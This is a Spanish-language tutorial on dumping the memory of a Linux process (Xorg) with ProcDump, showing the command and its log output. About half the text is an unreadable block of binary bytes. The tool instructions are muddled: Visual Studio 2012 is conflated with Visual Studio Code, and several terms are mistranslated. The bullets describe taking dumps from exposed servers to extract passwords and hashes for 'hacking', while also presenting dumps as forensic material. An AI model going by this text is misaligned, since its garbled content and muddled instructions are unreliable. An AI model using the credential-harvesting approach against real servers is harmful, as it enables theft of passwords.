                                                                                                                         VJ▒ڽV VJ▒ڽV▒ڽVl▒I▒ڽV▒L▒IڽV▒▒I&ڽVp9▒G`▒▒GVڽVfڽVvڽV▒ڽV▒ڽV▒▒▒Gp▒▒Gk▒G▒ڽVP▒H▒ڽVڽV@▒▒G0▒▒Gg▒IFڽVVڽVfڽV▒▒▒G`▒▒G▒G▒▒GVJ▒▒▒GPh▒G▒z▒G▒ڽVeVJڽV&ڽV▒H▒I ▒H0▒▒G▒l▒Io▒G▒ڽV;I▒ڽV▒ڽV▒ڽV▒ڽV▒vVJ▒ڽVڽVڽV&ڽV6ڽVFڽVVڽVfڽVp▒G▒hVJ▒ڽV@#VJ▒ڽV▒ڽV'VJ▒ڽV▒OJڽVڽV&ڽV6ڽV▒H▒j▒G0Q▒Gp▒▒G@▒G▒ڽV▒▒I▒V`I0▒G▒o▒G@▒H▒▒I▒▒GڽV▒I▒▒▒GFڽVVڽVfڽV@h▒I▒ڽV▒ڽV@o▒H▒VJ▒▒▒G▒bJ▒ڽV▒▒:IpVJH▒I▒▒:I6ڽVFڽVp▒▒GP▒▒G▒▒▒G▒ڽV`▒▒G▒▒▒G▒ڽVx▒G▒ڽV▒ڽV▒?HڽVڽV▒▒G6ڽVFڽVP▒▒GfڽVI▒I▒ڽV@   VJPVJ▒ڽV▒ڽV▒▒G▒ڽVPdVJp▒▒GڽVk▒G6ڽVFڽV0▒▒GfڽV▒T▒Ge▒G0p▒G▒ڽV ▒▒Gp▒:I▒ڽV▒▒:I`▒:I`iVJڽVP▒:I`56Ip▒▒G▒)H@▒▒G▒{▒G▒ڽV▒▒G▒ڽV▒ڽV▒ڽV▒▒G▒▒▒G@▒▒GڽVڽV&ڽV6ڽVFڽV ▒▒GfڽVvڽVp▒▒G▒ڽV▒Y`I▒ڽV▒▒▒G▒▒:I▒▒GP▒`H▒▒▒GЉ▒G&▒V6▒VF▒V▒▒If▒V@▒▒G▒▒▒G▒ϡI<H▒J▒▒V▒▒V▒▒V ▒▒G I▒I▒OH@▒`H [VJP▒▒IVڽVp▒▒GvڽV@▒▒I`g▒G▒ڽV▒ڽV▒▒▒Gp▒▒GVJ▒ڽV▒▒HڽV▒bVJ▒u▒G▒▒G▒jVJ▒▒GvڽV▒ڽV▒▒G▒ڽV0▒▒G▒▒▒G▒ڽV▒ڽV@▒I▒J▒IڽV@▒▒G h▒GFڽVVڽV▒▒GvڽV▒ڽ▒G ▒▒G▒▒▒G1VJ▒▒:I▒▒:I▒t▒GڽVڽV▒▒:I0gVJFڽVVڽVfڽV▒▒▒G▒▒▒G▒H▒ڽV▒[VJ▒:I`▒:I▒▒▒G▒▒▒G▒▒▒G ڽV |▒Gp▒▒G0▒▒IV ڽVf ڽVv ڽV@▒H▒ ڽV▒ ڽV▒▒:I▒ ڽV▒ ڽV▒ ڽV▒ ڽV▒]VJpp▒G&!ڽV6!ڽVF!ڽV▒vVJf!ڽV▒▒▒G▒!ڽV▒!ڽV▒!ڽV▒!ڽV▒!ڽV▒▒▒G▒~Jpj▒IЩ:I"ڽV&"ڽV6"ڽVF"ڽV▒▒:If"ڽV▒i▒G`▒▒G▒▒G@▒:I`▒:I▒"ڽV▒:I▒"ڽV▒3J#ڽV▒▒G AH6#ڽV@▒▒GV#ڽVf#ڽV0▒▒G▒#ڽVVJ0▒▒G]▒G▒#ڽV▒#ڽV▒▒:I{`I$ڽV▒▒▒G▒Y`I`▒▒GpϡIV$ڽVPwVJp▒G▒V`I▒$ڽV`▒▒G.Jp?Hp▒:Ip|▒G▒$ڽV@СI%ڽVpL▒I6%ڽV▒▒GpVJ0v▒G▒vVJ@▒:I▒%ڽV▒%ڽV▒%ڽV▒w▒G▒▒Gp▒Hpo▒G&ڽV0▒▒G&&ڽV6&ڽV0▒Jp▒Hf&ڽV▒I▒▒G▒&ڽV▒▒▒G@MJ▒V▒G@w▒H▒K`H'ڽV▒▒:I&'ڽV6'ڽVF'ڽV▒▒▒Gf'ڽV▒▒▒G▒'ڽV▒'ڽV▒'ڽV▒'ڽV▒'ڽV▒'ڽV▒'ڽV▒'ڽV(ڽV(ڽV▒▒H6(ڽVF(ڽV▒▒▒I0@▒G@▒H▒(ڽV▒(ڽV▒(ڽV▒(ڽV`]VJ▒(ڽV▒dH▒(ڽV▒~▒G▒▒▒G@▒H6)ڽVF)ڽVV)ڽVP▒H▒▒G▒)ڽV@▒▒G▒)ڽV`▒▒G▒)ڽV▒)ڽV▒)ڽV▒)ڽV*ڽV*ڽV&*ڽV /L▒▒▒GV*ڽVf*ڽV▒:I▒*ڽV▒}▒V6▒V▒▒V▒▒▒V0▒▒V@▒▒V▒▒V▒▒V▒▒▒V▒▒V▒▒▒V▒▒▒V`i▒V▒i▒V0r▒V@u▒V▒q▒V▒j▒V▒j▒V▒l▒VPm▒Vpv▒V▒v▒V▒v▒V@w▒V▒w▒V x▒V▒x▒V@z▒Vp▒▒V▒▒V`▒▒V▒3▒V`9▒V▒8▒V▒3▒V@9▒V▒8▒V9▒V:▒V▒9▒V▒▒V@▒▒VP▒▒V▒▒V0▒▒V▒▒▒V▒▒▒V▒▒▒V▒▒▒V▒▒V0▒▒VP▒▒V▒▒Vp▒V▒▒V@▒V▒▒V@▒V▒ ▒V0 ▒V▒!▒V`!▒Vp▒▒VЛ▒V▒V ▒▒VЫ▒V ▒▒V▒▒VП▒V▒߽V▒߽V▒▒▒V▒▒▒V▒▒▒V▒▒▒V▒▒V`▒▒V▒▒▒V0▒▒V▒▒▒V▒▒▒V▒▒▒V▒P▒VPQ▒V▒Q▒V▒S▒VPU▒V▒N▒VpN▒VPW▒V▒W▒V▒W▒VpW▒VH▒V▒H▒V`H▒V▒S▒V@H▒VS▒V`C▒V`S▒V▒C▒V▒C▒VD▒VG▒V▒W▒V▒W▒V▒Z▒V▒W▒V▒Z▒V▒[▒V\▒V▒\▒VP▒߽V ▒߽VX&▒V`&▒V▒߽V`▒߽V▒߽V▒n▒V▒o▒VPo▒V0p▒V▒4▒V▒@▒V0:▒V@$▒V▒;▒V<▒V▒:▒V▒?▒VpA▒V▒9▒V▒8▒V0B▒VD▒V▒D▒V%▒V▒>▒V▒=▒V▒1▒V▒<▒V▒<▒V▒:▒V@%▒V▒E▒V▒]▒V▒▒▒V▒▒▒V▒▒▒V▒▒▒V▒▒▒V0▒▒V▒▒▒V ޽V▒޽V▒5ݽV▒▒ڽV▒,V▒,V`iݽV▒۽V0▒۽Vp▒۽V▒▒۽V▒▒۽V`
  • Para abrir el archivo use Visual Studio. Estamos utilizando Visual Studio 2012 para abrir el archivo de volcado. Puede abrir el archivo de volcado en Linux o Windows
  • Para instalar Visual Studio escriba sudo add-apt-repository ppa:ubuntu-desktop/ubuntumake
  • Escriba sudo apt-get update y escriba sudo apt-get install ubuntu-make
  • Escriba umake web visual-studio-code
  • A continuación, escriba a para instalar Visual Studio
  • Después de abrir el archivo anterior en Visual Studio, se verá como:
  • Lo anterior es volcado del proceso 1409 en Ubuntu. Como puede ver, ha creado volcados del proceso dado. Muestra códigos de lenguaje ensamblador que pueden ser decodificados
  • La información anterior se puede utilizar en otras actividades de hacking
  • Encontrar volcados en un servidor abierto puede darle acceso a los archivos de volcado. Esos archivos de volcado se pueden utilizar para obtener contraseñas
  • Como estos archivos de volcado contienen una contraseña en forma de volcado de hash que puede revelar mucha información
  • Escriba sudo procdump -p 1409 -c 30 -n 3 -s 15
  • -p se utiliza para asignar ID de proceso
  • -c se utiliza para umbral de CPU y crear volcado
  • -n se usa para escribir número de vertederos
  • -s se utiliza en segundos consecutivos antes de escribir el volcado
root@ubuntu:/home/iicybersecurity/Downloads/ProcDump-for-Linux# sudo procdump -p 1409 -c 30 -n 3 -s 15
 ProcDump v1.0.1 - Sysinternals process dump utility
 Copyright (C) 2017 Microsoft Corporation. All rights reserved. Licensed under the MIT license.
 Mark Russinovich, Mario Hewardt, John Salem, Javid Habibi
 Monitors a process and writes a dump file when the process exceeds the
 specified criteria.
 Process:  Xorg (1409)
 CPU Threshold:  <30
 Commit Threshold: n/a
 Threshold Seconds: 15
 Number of Dumps: 3
 Press Ctrl-C to end monitoring without terminating the process.
 [21:47:38 - INFO]: CPU: 0%
 [21:47:41 - INFO]: Core dump 1 generated: Xorg_cpu_2019-01-24_21:47:38.1409
 [21:47:57 - INFO]: CPU: 0%
 [21:48:03 - INFO]: Core dump 2 generated: Xorg_cpu_2019-01-24_21:47:57.1409
 [21:48:19 - INFO]: CPU: 0%
 [21:48:23 - INFO]: Core dump 3 generated: Xorg_cpu_2019-01-24_21:48:19.1409
  • La consulta anterior ha generado 3 archivos volcados. Se pueden generar tantos volcados como se desee
  • Ahora abra todos los archivos volcados en Visual Studio 2012
  • Lo anterior es volcado del proceso 1409 en Ubuntu. Como puede ver, ha creado volcados del proceso dado. Muestra códigos de lenguaje ensamblador que pueden ser decodificados
  • La información anterior se puede utilizar en el análisis forense de cualquier malware que se ejecute en el sistema, según lo declarado por el experto en seguridad en redes del Instituto Internacional de Seguridad Cibernética